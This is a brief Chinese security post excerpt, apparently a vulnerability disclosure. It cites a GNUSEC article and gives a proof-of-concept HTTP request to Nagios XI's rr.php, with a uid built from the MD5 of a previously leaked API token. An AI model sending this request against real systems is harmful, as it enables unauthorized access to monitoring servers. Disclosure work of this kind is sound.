参考来源:[GNUSEC](https://mp.weixin.qq.com/s?__biz=MzI3MjA0ODgwNQ==&mid=2651087868&idx=1&sn=48251c39ed31db7116889913ea4d3dc8&scene=1&srcid=0603gTXuxET7NJsMKXDSTLF0&key=8d8120cb97983fadeb6c682a37490f8b76e5f89f0d36466a0d56c0353187341bcffe7a0d983d92bf9dee537d783e7f4a&ascene=0&uin=MTE4NDAxNTgyMQ%3D%3D&devicetype=iMac+MacBookPro11%2C1+OSX+OSX+10.11.4+build(15E65)
[POC]
```
// uid == <user_id>-<object_id>-<MD5(api token)>, hash价为上一部爆出来的token的md5值
GET /nagiosxi/rr.php?uid=1-b-<hash> HTTP/1.1
```
![](http://mmbiz.qpic.cn/mmbiz/y5cx3dlMfic9OjcwNxkcI391JFSPf5SYqK1WkyFgYVcThf0AKOIU3oaWatH5r3PLJQwltAsdgnsVfaQWH1yzWRA/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1)
暂无评论